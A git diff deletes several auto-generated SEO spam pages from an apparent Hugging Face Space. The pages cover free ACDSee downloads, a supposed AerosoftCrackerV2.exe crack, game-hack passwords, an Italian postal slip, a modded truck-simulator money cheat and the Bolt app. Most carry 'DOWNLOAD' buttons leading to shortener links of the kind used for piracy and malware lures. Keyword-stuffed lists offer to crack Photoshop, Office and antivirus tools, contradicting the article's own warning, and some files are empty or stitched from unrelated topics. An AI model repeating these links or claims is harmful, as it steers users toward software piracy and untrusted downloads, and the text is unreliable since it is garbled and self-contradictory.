diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/ACDSee for Windows 10 The Best Photo Editing Software You Can Try for Free.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/ACDSee for Windows 10 The Best Photo Editing Software You Can Try for Free.md deleted file mode 100644 index 8f4fba51302f78cb622d13e4a8de6491a76e6227..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/ACDSee for Windows 10 The Best Photo Editing Software You Can Try for Free.md +++ /dev/null @@ -1,29 +0,0 @@ - -

How to Free Download ACDSee for Windows 10

-

If you are looking for a powerful and easy-to-use photo editing software, you might want to try ACDSee. ACDSee is a popular program that allows you to organize, edit, and share your photos with ease. It has many features and tools that can help you enhance your images and create stunning results.

-

free download acdsee for windows 10


DOWNLOAD ►►► https://byltly.com/2uKxji



-

But how can you get ACDSee for Windows 10? Is there a way to free download it? The answer is yes, but you need to be careful. There are many websites that claim to offer free downloads of ACDSee, but some of them might be scams or contain viruses. You don't want to risk your computer's security or waste your time with fake downloads.

-

That's why we recommend using the official website of ACDSee. There, you can find the latest version of ACDSee for Windows 10, as well as other products and services from the company. You can also get a free trial of ACDSee for 30 days, which will let you test all the features and functions of the software before you decide to buy it.

-

To free download ACDSee for Windows 10 from the official website, follow these steps:

-
    -
1. Go to https://www.acdsee.com/en/index/ and click on the "Download" button at the top right corner.
2. Select the product you want to download. In this case, choose "ACDSee Photo Studio Ultimate 2023" or "ACDSee Photo Studio Professional 2023", depending on your needs and preferences.
3. Click on the "Free Trial" button and fill in your name and email address. You will receive a confirmation email with a link to download the software.
4. Click on the link in the email and follow the instructions to install ACDSee on your Windows 10 computer.
5. Enjoy your free trial of ACDSee for 30 days. You can use all the features and tools of the software without any limitations or watermarks.
-

That's it! You have successfully free downloaded ACDSee for Windows 10. Now you can start editing and sharing your photos with this amazing software. If you like it, you can purchase a license from the official website or from an authorized reseller. ACDSee offers different plans and prices to suit your budget and needs.

-

We hope this article was helpful and informative. If you have any questions or feedback, feel free to leave a comment below. Thank you for reading!

-

- -

Why Choose ACDSee for Windows 10?

-

ACDSee is one of the best photo editing programs for Windows 10. It has many advantages that make it stand out from other programs. Here are some of the reasons to choose ACDSee for Windows 10:

- It lets you organize, edit, and share your photos with ease.
- It offers a wide range of features and tools to enhance your images and create stunning results.
- You can try it free for 30 days, with no limitations or watermarks.
- It comes in different plans and prices to suit your budget and needs.

As you can see, ACDSee is a great choice for Windows 10 users who want to edit and manage their photos in a fast, easy, and professional way. If you haven't tried it yet, don't miss this opportunity to free download ACDSee for Windows 10 from the official website. You won't regret it!

-
-
\ No newline at end of file diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/AerosoftCrackerV2.exel Save Money and Time with This Amazing Cracker.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/AerosoftCrackerV2.exel Save Money and Time with This Amazing Cracker.md deleted file mode 100644 index b404f57a568c080885e91f518a0681b2f49cb166..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/AerosoftCrackerV2.exel Save Money and Time with This Amazing Cracker.md +++ /dev/null @@ -1,151 +0,0 @@ - -

What is AerosoftCrackerV2.exe and why you should avoid it

-

Have you ever heard of AerosoftCrackerV2.exe? If you are a fan of flight simulation games, you may have come across this file online. It claims to be a crack for Aerosoft products, which are popular add-ons for Microsoft Flight Simulator X (FSX) and Prepar3D (P3D). However, don't be fooled by its name. AerosoftCrackerV2.exe is not a legitimate crack, but a malicious program that can harm your computer and compromise your security.

-

In this article, we will explain what AerosoftCrackerV2.exe is, how it works, what are the symptoms of its infection, how to remove it from your computer, and how to prevent it from infecting your computer in the future. By reading this article, you will learn how to protect yourself from this dangerous threat and enjoy your flight simulation games safely.

-

AerosoftCrackerV2.exel


DOWNLOAD ✔✔✔ https://byltly.com/2uKzBd



-

How does AerosoftCrackerV2.exe work?

-

AerosoftCrackerV2.exe is a type of malware that belongs to the Trojan category. A Trojan is a program that pretends to be something else in order to trick users into downloading or running it. Once executed, a Trojan can perform various malicious actions on the infected computer without the user's knowledge or consent.

-

AerosoftCrackerV2.exe works by posing as a crack for Aerosoft products. A crack is a program that modifies or bypasses the security features of a software product in order to use it for free or without restrictions. Some users may be tempted to use cracks for flight simulation add-ons because they are expensive or hard to find. However, using cracks is illegal and risky, as they may contain malware or viruses that can damage your computer or steal your personal information.

-

When you download or run AerosoftCrackerV2.exe on your computer, it will install itself in a hidden location and create several files and registry entries that allow it to run automatically every time you start your computer. It will also try to disable your antivirus software or firewall in order to avoid detection and removal. Then, it will perform various malicious activities on your computer, such as:

- Downloading and installing other malware or viruses
- Stealing your personal information
- Monitoring your online activities
- Displaying unwanted ads or pop-ups
- Redirecting your web browser to malicious websites
- Slowing down your computer performance or causing crashes and errors

What are the symptoms of AerosoftCrackerV2.exe infection?

-

If your computer is infected by AerosoftCrackerV2.exe, you may notice some of the following signs:

- Your antivirus software or firewall is disabled or not working properly
- Your computer runs slower than usual or freezes frequently
- You see strange files or folders on your computer that you don't recognize
- You see unwanted ads or pop-ups related to flight simulation products or services
- Your web browser is redirected to unfamiliar websites that ask you to download or buy something
- You receive warnings or alerts from unknown sources claiming your computer is infected or needs repair
- You notice unauthorized charges on your credit card or bank account statements

How to remove AerosoftCrackerV2.exe from your computer?

-

If you suspect that your computer is infected by AerosoftCrackerV2.exe, you should take immediate action to remove it from your computer. There are two methods that you can use to remove AerosoftCrackerV2.exe: manual removal method and automatic removal method.

-

Manual removal method

-

The manual removal method involves deleting AerosoftCrackerV2.exe and its related files and registry entries from your computer manually. This method requires some technical skills and knowledge of how to access and modify system files and settings. If you are not confident or experienced in doing this, we recommend that you use the automatic removal method instead.

-

To manually remove AerosoftCrackerV2.exe from your computer, follow the steps below (a small scripted sketch of the same file and registry checks appears after the list):

-
    -
1. Restart your computer in Safe Mode with Networking. To do this, press F8 repeatedly while booting up until you see a menu with different options. Choose Safe Mode with Networking and press Enter.
2. Open Task Manager by pressing Ctrl+Alt+Delete keys together. Look for any suspicious processes that are related to AerosoftCrackerV2.exe and end them.
3. Open File Explorer by pressing Windows+E keys together and delete any files or folders related to AerosoftCrackerV2.exe from the locations where the program installed itself.
4. Open Registry Editor by pressing Windows+R keys together and typing regedit in the Run box. Click OK, then delete any sub-keys or values related to AerosoftCrackerV2.exe from the keys the program created.
5. Close Registry Editor and restart your computer normally.
-
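The file and registry checks described above can also be scripted. The sketch below is a minimal, report-only example in Python for Windows: it does not delete anything, and the directories, the marker string, and the autostart Run key it inspects are illustrative assumptions rather than locations confirmed for this particular threat.

```python
# Report-only helper illustrating the manual checks described above.
# The directories and marker string are PLACEHOLDERS: the real locations
# used by the malware are not listed in this article.
import os
import winreg

SUSPECT_NAME = "AerosoftCrackerV2"                 # placeholder marker string
SUSPECT_DIRS = [                                    # placeholder directories to inspect
    os.path.expandvars(r"%APPDATA%"),
    os.path.expandvars(r"%TEMP%"),
]
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"  # common autostart key

def find_suspect_files():
    """List files under the placeholder directories whose name contains the marker."""
    hits = []
    for root_dir in SUSPECT_DIRS:
        for dirpath, _dirnames, filenames in os.walk(root_dir):
            for name in filenames:
                if SUSPECT_NAME.lower() in name.lower():
                    hits.append(os.path.join(dirpath, name))
    return hits

def find_suspect_run_entries():
    """List autostart values under HKCU\\...\\Run that mention the marker."""
    hits = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, value, _type = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            if SUSPECT_NAME.lower() in f"{name} {value}".lower():
                hits.append((name, value))
            index += 1
    return hits

if __name__ == "__main__":
    print("Suspicious files:", find_suspect_files())
    print("Suspicious Run entries:", find_suspect_run_entries())
```

Reviewing what such a script reports, rather than deleting automatically, keeps the final decision with you.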

Automatic removal method

-

The automatic removal method involves using a reliable anti-malware tool to scan and remove AerosoftCrackerV2.exe and its related files and registry entries from your computer automatically. This method is easier and safer than the manual removal method, as it does not require any technical skills or knowledge of how to access and modify system files and settings. It also ensures that no traces of AerosoftCrackerV2.exe are left behind on your computer.

-

How to use AerosoftCrackerV2.exel to crack software
-AerosoftCrackerV2.exel download link
-Is AerosoftCrackerV2.exel safe and virus-free?
-AerosoftCrackerV2.exel tutorial and guide
-AerosoftCrackerV2.exel reviews and feedback
-AerosoftCrackerV2.exel alternatives and competitors
-AerosoftCrackerV2.exel compatibility and requirements
-AerosoftCrackerV2.exel features and benefits
-AerosoftCrackerV2.exel updates and patches
-AerosoftCrackerV2.exel license and terms of use
-AerosoftCrackerV2.exel support and customer service
-AerosoftCrackerV2.exel errors and troubleshooting
-AerosoftCrackerV2.exel tips and tricks
-AerosoftCrackerV2.exel best practices and recommendations
-AerosoftCrackerV2.exel case studies and success stories
-How to uninstall AerosoftCrackerV2.exel
-How to optimize AerosoftCrackerV2.exel performance
-How to customize AerosoftCrackerV2.exel settings
-How to integrate AerosoftCrackerV2.exel with other tools
-How to backup and restore AerosoftCrackerV2.exel data
-How to upgrade from AerosoftCrackerV1 to AerosoftCrackerV2.exel
-How to get a free trial of AerosoftCrackerV2.exel
-How to buy AerosoftCrackerV2.exel with a discount code
-How to contact the developer of AerosoftCrackerV2.exel
-How to report a bug or issue with AerosoftCrackerV2.exel
-How to join the community of AerosoftCrackerV2.exel users
-How to access the documentation of AerosoftCrackerV2.exel
-How to learn more about the technology behind AerosoftCrackerV2.exel
-How to crack Adobe Photoshop with AerosoftCrackerV2.exel
-How to crack Microsoft Office with AerosoftCrackerV2.exel
-How to crack Autodesk AutoCAD with AerosoftCrackerV2.exel
-How to crack CorelDRAW with AerosoftCrackerV2.exel
-How to crack FL Studio with AerosoftCrackerV2.exel
-How to crack Adobe Premiere Pro with AerosoftCrackerV2.exel
-How to crack Sony Vegas Pro with AerosoftCrackerV2.exel
-How to crack Ableton Live with AerosoftCrackerV2.exel
-How to crack Adobe Illustrator with AerosoftCrackerV2.exel
-How to crack Adobe InDesign with AerosoftCrackerV2.exel
-How to crack Adobe After Effects with AerosoftCrackerV2.exel
-How to crack Adobe Acrobat Pro with AerosoftCrackerV2.exel
-How to crack SketchUp Pro with AerosoftCrackerV2.exel
-How to crack Camtasia Studio with AerosoftCrackerV2.exel
-How to crack Nero Burning ROM with AerosoftCrackerV2.exel
-How to crack WinRAR with AerosoftCrackerV2.exel
-How to crack VMware Workstation with AerosoftCrackerV2.exel
-How to crack CyberLink PowerDVD with AerosoftCrackerV2.exel
-How to crack Avast Antivirus with AerosoftCrackerV2.exel
-How to crack Malwarebytes Anti-Malware with AerosoftCrackerV2.exel
-How to crack CCleaner Professional with AerosoftCrackerV2.exel

-

To automatically remove AerosoftCrackerV2.exe from your computer, follow these steps:

-
    -
1. Download and install a reputable anti-malware tool on your computer. You can choose from various options, such as Malwarebytes, SpyHunter, Trend Micro, etc.
2. Launch the anti-malware tool and update its database to the latest version.
3. Perform a full system scan with the anti-malware tool and wait for it to finish.
4. Review the scan results and select all the detected threats related to AerosoftCrackerV2.exe.
5. Click on the Remove or Quarantine button to delete or isolate AerosoftCrackerV2.exe and its related files and registry entries from your computer.
6. Restart your computer if prompted by the anti-malware tool.
-

How to prevent AerosoftCrackerV2.exe infection in the future?

-

Now that you have removed AerosoftCrackerV2.exe from your computer, you may wonder how to prevent it from infecting your computer again in the future. Here are some tips that you can follow to avoid downloading or running malicious programs like AerosoftCrackerV2.exe:

- Use a firewall and an anti-malware tool, and keep them updated
- Don't open email messages from unfamiliar senders or attachments that you don't recognize
- Use a pop-up blocker and a modern browser with SmartScreen enabled, and pay attention to its warnings before running unrecognized apps downloaded from the internet
- Keep Windows and your other software updated with the latest patches and security fixes
- Use strong passwords, change them regularly, and back up your important data to an external drive or cloud storage
- Only download flight simulation add-ons and other software from official or trusted sources, and avoid cracks altogether

Conclusion

-

AerosoftCrackerV2.exe is a malicious program that claims to be a crack for Aerosoft products, which are popular add-ons for flight simulation games. However, it is not a legitimate crack, but a Trojan that can harm your computer and compromise your security. It can perform various malicious activities on your computer, such as downloading and installing other malware or viruses, stealing your personal information, monitoring your online activities, displaying unwanted ads or pop-ups, redirecting your web browser to malicious websites, slowing down your computer performance or causing crashes or errors.

-

To protect yourself from this dangerous threat, you should avoid using cracks for flight simulation add-ons or any other software products. You should also only download flight simulation add-ons or any other software products from official or trusted sources. You should always scan any downloaded files with a reliable anti-virus or anti-malware tool before opening or running them. You should also keep your operating system and software products updated with the latest patches and security fixes. You should also use a strong password for your online accounts and change it regularly. You should also backup your important data regularly to an external drive or cloud storage.

-

If you suspect that your computer is infected by AerosoftCrackerV2.exe, you should take immediate action to remove it from your computer. You can use either the manual removal method or the automatic removal method to do so. The manual removal method involves deleting AerosoftCrackerV2.exe and its related files and registry entries from your computer manually. The automatic removal method involves using a reliable anti-malware tool to scan and remove AerosoftCrackerV2.exe and its related files and registry entries from your computer automatically.

-

We hope this article has helped you understand what AerosoftCrackerV2.exe is, how it works, what are the symptoms of its infection, how to remove it from your computer, and how to prevent it from infecting your computer in the future. By following these tips, you will be able to enjoy your flight simulation games safely and securely.

-

FAQs

-

Here are some frequently asked questions and answers about AerosoftCrackerV2.exe:

-
    -
1. What is Aerosoft?

    Aerosoft is a German company that develops and publishes add-ons for flight simulation games, such as Microsoft Flight Simulator X (FSX) and Prepar3D (P3D). They offer various products that enhance the realism and immersion of flight simulation games, such as airports, aircrafts, sceneries, tools, etc.

    -
2. What is a crack?

    A crack is a program that modifies or bypasses the security features of a software product in order to use it for free or without restrictions. Some users may be tempted to use cracks for flight simulation add-ons because they are expensive or hard to find. However, using cracks is illegal and risky, as they may contain malware or viruses that can damage your computer or steal your personal information.

    -
3. What is a Trojan?

    A Trojan is a type of malware that pretends to be something else in order to trick users into downloading or running it. Once executed, a Trojan can perform various malicious actions on the infected computer without the user's knowledge or consent. Trojans are often used by hackers to gain remote access to computers, steal data, install other malware, etc.

    -
4. How can I tell if my computer is infected by AerosoftCrackerV2.exe?

    If your computer is infected by AerosoftCrackerV2.exe, you may notice some of the following signs: Your antivirus software or firewall is disabled or not working properly; Your computer runs slower than usual or freezes frequently; You see strange files or folders on your computer that you don't recognize; You see unwanted ads or pop-ups on your screen that are related to flight simulation products or services; Your web browser is redirected to unfamiliar websites that ask you to download or buy something; You receive warnings or alerts from unknown sources that claim your computer is infected or needs repair; You notice unauthorized charges on your credit card or bank account statements.

    -
5. How can I protect my computer from malware?

    You can protect your computer from malware by following some simple tips, such as: Use a firewall and an anti-malware tool and keep them updated; Don't open email messages from unfamiliar senders or email attachments that you don't recognize; Use a pop-up blocker and a modern browser with SmartScreen enabled; Pay attention to Windows SmartScreen notifications and don't run unrecognized apps downloaded from the internet; Keep Windows and other software products updated with the latest patches and security fixes; Use strong passwords and change them regularly; Backup your important data regularly to an external drive or cloud storage.

    -
-

-
-
\ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/ABYSS CRAWLERS Plus Game Hack Password !!BETTER!!.md b/spaces/1gistliPinn/ChatGPT4/Examples/ABYSS CRAWLERS Plus Game Hack Password !!BETTER!!.md deleted file mode 100644 index 57235a8cc6310ad0e241d3326cdd5d411c01f8bb..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/ABYSS CRAWLERS Plus Game Hack Password !!BETTER!!.md +++ /dev/null @@ -1,6 +0,0 @@ -

ABYSS CRAWLERS plus game hack password


Download Filehttps://imgfil.com/2uxYWD



-
-
-

diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Bollettino Postale 896 22.pdfl ((FREE)).md b/spaces/1gistliPinn/ChatGPT4/Examples/Bollettino Postale 896 22.pdfl ((FREE)).md deleted file mode 100644 index 60607a7b3a3d6fcdbf775a1739dc1145bb0c4f77..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Bollettino Postale 896 22.pdfl ((FREE)).md +++ /dev/null @@ -1,75 +0,0 @@ - -

Bollettino Postale 896 22.pdf: How to Download It and Pay It Online

-

The postal payment slip (bollettino postale) is one of the most widely used ways to make payments to public bodies or private parties that hold a postal current account. There are several types of postal slips, depending on their purpose and how they are filled in. In this article we will focus on bollettino postale 896 22.pdf, a pre-filled slip used to pay taxes, contributions, stamp duties, and other charges. We will look at what it is, how to fill it in, where to find it, and how to pay it online.

-

What is bollettino postale 896 22.pdf?

-

Bollettino postale 896 22.pdf is a document that lets you make a payment at any post office in favour of a specific party that holds a postal current account. It is a pre-filled slip, meaning that some fields already contain the information needed for the payment. This type of slip is used to pay taxes, contributions, stamp duties, and other charges.

-

Bollettino Postale 896 22.pdfl


Download > https://imgfil.com/2uxXMr



-

How to fill in bollettino postale 896 22.pdf

-

To fill in bollettino postale 896 22.pdf you need to enter the following details:

- -

Where to find bollettino postale 896 22.pdf

-

You can find bollettino postale 896 22.pdf in several ways:

- -

How to pay bollettino postale 896 22.pdf online

-

If you want to avoid queues at the post office, you can pay bollettino postale 896 22.pdf online through the following services:

-

-

What are the advantages and disadvantages of bollettino postale 896 22.pdf?

-

Bollettino postale 896 22.pdf is a very common and widely used payment method in Italy. However, like anything else, it has advantages and disadvantages that you should know before using it. Let's look at them:

- -

How to solve problems with bollettino postale 896 22.pdf

-

Sometimes you may run into problems with bollettino postale 896 22.pdf. For example, you may have lost it, filled it in incorrectly, torn it, or never received it. In these cases, you need to know how to sort things out. Here are some tips:

- -

What are the alternatives to bollettino postale 896 22.pdf?

-

If you don't want to use bollettino postale 896 22.pdf for your payments, you can choose from several alternatives. Some of them are:

- -

Conclusion

-

Bollettino postale 896 22.pdf is one of the most widely used ways to make payments to public bodies or private parties that hold a postal current account. It is a pre-filled slip used to pay taxes, contributions, stamp duties, and other charges. To use it, you fill in a few fields with the required details and take it to the post office, or pay it online. Bollettino postale 896 22.pdf has advantages and disadvantages you should know before choosing it, and there are alternatives you can weigh up according to your needs and preferences.

-

-

-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Android Oyun Clubta Truck Simulator Ultimate Apk Para Hileli Oyna - Gereki ehirler ve Trlar.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Android Oyun Clubta Truck Simulator Ultimate Apk Para Hileli Oyna - Gereki ehirler ve Trlar.md deleted file mode 100644 index 5fac705814d0c8627255d0661104e8d82b8bed0f..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Android Oyun Clubta Truck Simulator Ultimate Apk Para Hileli Oyna - Gereki ehirler ve Trlar.md +++ /dev/null @@ -1,109 +0,0 @@ -
-

Truck Simulator Ultimate Apk: A Realistic and Fun Truck Driving Game

-

If you are a fan of truck driving games, you might have heard of Truck Simulator Ultimate Apk, a new and exciting game that lets you experience the thrill of driving a truck across different countries and continents. In this article, we will tell you everything you need to know about this game, including its features, how to download and install it, and how to get para hilesi from Android Oyun Club, a popular Turkish website for modded games.

-

What is Truck Simulator Ultimate Apk?

-

Truck Simulator Ultimate Apk is a simulation game developed by Zuuks Games, the same company that created Bus Simulator and Euro Truck Driver. The game was released in September 2021 and has already gained millions of downloads and positive reviews from players around the world. The game aims to provide a realistic and fun truck driving experience, with stunning graphics, realistic physics, and diverse gameplay options.

-

truck simulator ultimate apk android oyun club para hilesi


Download File >> https://urlin.us/2uSTWc



-

Features of Truck Simulator Ultimate Apk

-

Truck Simulator Ultimate Apk has many features that make it stand out from other truck driving games. Here are some of them:

-

Realistic truck models and physics

-

The game features over 30 different truck models from famous brands such as Mercedes-Benz, Volvo, Scania, MAN, Renault, and more. Each truck has its own specifications, performance, and sound effects. The game also uses an advanced physics engine to simulate the weight, speed, braking, steering, suspension, and damage of the trucks.

-

Customizable trucks and trailers

-

You can customize your trucks and trailers with various options such as paint, decals, wheels, lights, horns, exhausts, bumpers, spoilers, and more. You can also upgrade your trucks with different engines, transmissions, chassis, tires, and accessories. You can create your own unique truck style and show it off to other players.

-

Dynamic weather and day-night cycle

-

The game has a dynamic weather system that changes according to the location and time of the day. You can drive in sunny, rainy, snowy, foggy, or stormy conditions. You can also experience the day-night cycle that affects the visibility and traffic on the roads. You have to adapt your driving style to the changing weather and lighting conditions.

-

Various cargo types and delivery missions

-

The game offers a variety of cargo types such as containers, cars, logs, food, chemicals, livestock, and more. You have to load your cargo onto your trailer and deliver it to the destination safely and on time. You have to follow the traffic rules, avoid accidents, pay tolls, refuel your truck, rest when needed, and manage your budget. You can earn money and experience points by completing delivery missions.

-

truck simulator ultimate apk indir android oyun club
-truck simulator ultimate apk hileli oyun indir club
-truck simulator ultimate apk mod para hilesi android
-truck simulator ultimate apk full sürüm android oyun club
-truck simulator ultimate apk son sürüm para hileli
-truck simulator ultimate apk android oyun club güncel
-truck simulator ultimate apk ücretsiz para hilesi indir
-truck simulator ultimate apk android oyun club kurulumu
-truck simulator ultimate apk hile nasıl yapılır android oyun club
-truck simulator ultimate apk android oyun club yorumları
-truck simulator ultimate apk android oyun club alternatifleri
-truck simulator ultimate apk android oyun club benzeri oyunlar
-truck simulator ultimate apk android oyun club sistem gereksinimleri
-truck simulator ultimate apk android oyun club online modu
-truck simulator ultimate apk android oyun club multiplayer özelliği
-truck simulator ultimate apk android oyun club grafik ayarları
-truck simulator ultimate apk android oyun club türkçe dil desteği
-truck simulator ultimate apk android oyun club araç modelleri
-truck simulator ultimate apk android oyun club harita genişliği
-truck simulator ultimate apk android oyun club gerçekçilik seviyesi
-truck simulator ultimate apk android oyun club tycoon modu nedir
-truck simulator ultimate apk android oyun club tycoon modu hileleri
-truck simulator ultimate apk android oyun club tycoon modu ipuçları
-truck simulator ultimate apk android oyun club tycoon modu rehberi
-truck simulator ultimate apk android oyun club tycoon modu stratejileri
-truck simulator ultimate apk android oyun club tycoon modu en iyi araçlar
-truck simulator ultimate apk android oyun club tycoon modu en iyi rotalar
-truck simulator ultimate apk android oyun club tycoon modu en iyi yatırımlar
-truck simulator ultimate apk android oyun club tycoon modu en iyi personel
-truck simulator ultimate apk android oyun club tycoon modu en iyi müşteriler
-truck simulator ultimate apk para hilesi nasıl yapılır android
-truck simulator ultimate apk para hilesi indirme linki android
-truck simulator ultimate apk para hilesi güvenli mi android
-truck simulator ultimate apk para hilesi ban riski var mı android
-truck simulator ultimate apk para hilesi avantajları nelerdir android
-truck simulator ultimate apk para hilesi dezavantajları nelerdir android
-truck simulator ultimate apk para hilesi kullanıcı yorumları android
-truck simulator ultimate apk para hilesi video anlatımı android
-truck simulator ultimate apk para hilesi sorun çözümleri android
-truck simulator ultimate apk para hilesi alternatif yöntemler android
-zuuks games truck simulator ultimate apk indir para hileli
-zuuks games truck simulator ultimate apk güncelleme para hileli
-zuuks games truck simulator ultimate apk inceleme para hileli
-zuuks games truck simulator ultimate apk özellikleri para hileli
-zuuks games truck simulator ultimate apk farkı nedir para hileli
-zuuks games truck simulator ultimate ap

-

Multiplayer mode and online ranking system

-

The game has a multiplayer mode that allows you to play with other players online. You can join or create a convoy with your friends or other players and drive together on the same map. You can chat with other players using voice or text messages. You can also compete with other players in the online ranking system based on your level, money earned, distance driven, cargo delivered, etc.

-

How to download and install Truck Simulator Ultimate Apk?

-

If you want to download and install Truck Simulator Ultimate Apk on your Android device, you can follow these simple steps:

-

Requirements and compatibility

-

Before you download and install the game, you need to make sure that your device meets the minimum requirements and is compatible with the game. The game requires Android 5.0 or higher, at least 3 GB of RAM, and 1.5 GB of free storage space. The game also supports 64-bit devices and controllers.

-

Download link and installation steps

-

You can download the game from the official Google Play Store by clicking on this link. Alternatively, you can also download the game from other sources such as APKPure or APKMirror, but make sure that you download the latest version and from a trusted website. After you download the game, you need to follow these steps to install it:
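The installation itself is the usual Android sideloading flow (enable installs from unknown sources, open the downloaded APK, and confirm the install). Since the article stresses using a trusted source, it is also worth checking that the file arrived intact before installing it. Below is a minimal integrity-check sketch using Python's standard hashlib; the file name and the reference checksum are placeholders you would replace with your own values, assuming the download page publishes a checksum at all.

```python
# Minimal integrity check for a downloaded APK.
# Both values below are placeholders: use your actual file path and the
# checksum published by the site you downloaded from (if it provides one).
import hashlib

APK_PATH = "truck_simulator_ultimate.apk"              # placeholder path
EXPECTED_SHA256 = "<checksum from the download page>"  # placeholder value

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Return the hex SHA-256 digest of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

if __name__ == "__main__":
    actual = sha256_of(APK_PATH)
    print("SHA-256:", actual)
    print("Matches expected:", actual == EXPECTED_SHA256.lower())
```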

- -

Congratulations, you have successfully installed Truck Simulator Ultimate Apk on your device. You can now enjoy driving your truck across different countries and continents.

-

What is Android Oyun Club and how to get para hilesi?

-

If you want to enhance your gaming experience and get some extra benefits in Truck Simulator Ultimate Apk, you might be interested in Android Oyun Club and para hilesi. Let's see what they are and how to use them.

-

Android Oyun Club: a popular Turkish website for modded games

-

Android Oyun Club is a website that provides modded versions of various Android games, including Truck Simulator Ultimate Apk. A modded game is a game that has been modified or hacked to provide some advantages or features that are not available in the original game. For example, a modded game might have unlimited money, unlocked items, premium features, etc.

-

Para hilesi: a cheat that gives unlimited money in the game

-

Para hilesi is a Turkish term that means money cheat. It is a cheat that gives you unlimited money in Truck Simulator Ultimate Apk. With unlimited money, you can buy any truck, trailer, upgrade, or customization that you want without worrying about your budget. You can also skip some delivery missions that are too hard or boring for you.

-

How to use para hilesi in Truck Simulator Ultimate Apk?

-

If you want to use para hilesi in Truck Simulator Ultimate Apk, you need to download the modded version of the game from Android Oyun Club. You can find the link to the modded game here. After you download the modded game, you need to follow these steps to use para hilesi:

- -

Enjoy playing Truck Simulator Ultimate Apk with para hilesi from Android Oyun Club.

-

Conclusion

-

In this article, we have covered everything you need to know about Truck Simulator Ultimate Apk, a realistic and fun truck driving game. We have explained its features, how to download and install it, and how to get para hilesi from Android Oyun Club. We hope that this article has been helpful and informative for you. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading and happy trucking!

-

Frequently Asked Questions

-

197e85843d
-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Bolt APK - The Best App for Booking Rides and Scooters.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Bolt APK - The Best App for Booking Rides and Scooters.md deleted file mode 100644 index 4f4e42e632e18b544cb02ab393bce29333722c3f..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Bolt APK - The Best App for Booking Rides and Scooters.md +++ /dev/null @@ -1,150 +0,0 @@ - -

What is APK Bolt and How to Use It?

-

Introduction

-

If you are looking for a convenient and cost-effective way to get around your city, you might want to try out APK Bolt. APK Bolt is an Android app that allows you to request a ride from a nearby driver, and enjoy a low-cost ride to your destination. But what exactly is an APK file, and what is Bolt? In this article, we will explain what APK Bolt is, how it works, what are its benefits, how to download and install it, and how it compares with other transportation apps.

-

apk bolt


Download ✏ ✏ ✏ https://urlin.us/2uSV9h



-

What is an APK file?

-

An APK file is a file format that is used to distribute and install applications on Android devices. APK stands for Android Package Kit, and it contains all the files and code that are needed for an app to run on your device. You can download APK files from various sources, such as the Google Play Store, third-party websites, or directly from the app developers. However, you need to enable the option to install apps from unknown sources in your device settings before you can install an APK file.
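Under the hood, an APK is simply a ZIP archive that bundles the app's manifest, compiled code, and resources. If you are curious, you can list its contents with Python's standard zipfile module; the file name below is a placeholder.

```python
# Peek inside an APK: it is a ZIP archive containing the app's manifest,
# compiled code and resources. The path below is a placeholder.
import zipfile

APK_PATH = "example.apk"  # placeholder path to a downloaded APK

with zipfile.ZipFile(APK_PATH) as apk:
    for info in apk.infolist()[:10]:  # first few entries only
        print(f"{info.file_size:>10}  {info.filename}")
    # Typical entries include AndroidManifest.xml, classes.dex and res/...
```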

-

What is Bolt?

-

Bolt is a transportation app that was formerly known as Taxify. It was founded in 2013 in Estonia, and it operates in 45 countries and 400 cities around the world. Bolt's mission is to provide fast, reliable, and affordable transportation to millions of people, while also helping thousands of drivers support their families. Bolt offers different types of services, such as ride-hailing, car-sharing, scooter-sharing, food delivery, and electric bikes.

-

What is APK Bolt?

-

APK Bolt is the name of the Android app that you can use to access the Bolt services on your device. You can download the APK Bolt file from various sources, such as [APKCombo], [APKPure], or [Uptodown]. With APK Bolt, you can tap the button to order a ride, see the price of your ride before you order, use a range of safety features, pay inside the app or with cash, and leave a rating for your driver.

-

Benefits of Using APK Bolt

-

Fast and Affordable Rides

-

One of the main benefits of using APK Bolt is that you can get a comfortable, low-cost ride in minutes. You don't have to wait for a long time for a driver to pick you up, as there are thousands of drivers available 24/7. You also don't have to pay a lot for your ride, as APK Bolt offers competitive prices that are cheaper than other transportation apps. You can also save money by using promo codes, discounts, and offers that are regularly available on the app.

-

apk bolt: request a ride
-apk bolt driver: drive with bolt
-apk bolt food: food delivery
-apk bolt business: manage your rides
-apk bolt lite: low-cost rides
-apk bolt browser: fast and secure web browser
-apk bolt taxi: book a taxi online
-apk bolt scooter: electric scooter rental
-apk bolt mod: unlocked features and unlimited money
-apk bolt vpn: protect your privacy online
-apk bolt app: download and install bolt app
-apk bolt game: race and drift with bolt cars
-apk bolt launcher: customize your home screen
-apk bolt video downloader: download videos from any website
-apk bolt music player: play and stream music offline
-apk bolt photo editor: edit and enhance your photos
-apk bolt keyboard: type faster and easier
-apk bolt lock screen: secure your phone with bolt pattern
-apk bolt wallpaper: beautify your phone with bolt wallpapers
-apk bolt theme: change the look and feel of your phone
-apk bolt chat: chat and make new friends
-apk bolt social media: connect with people around the world
-apk bolt news: get the latest news and updates
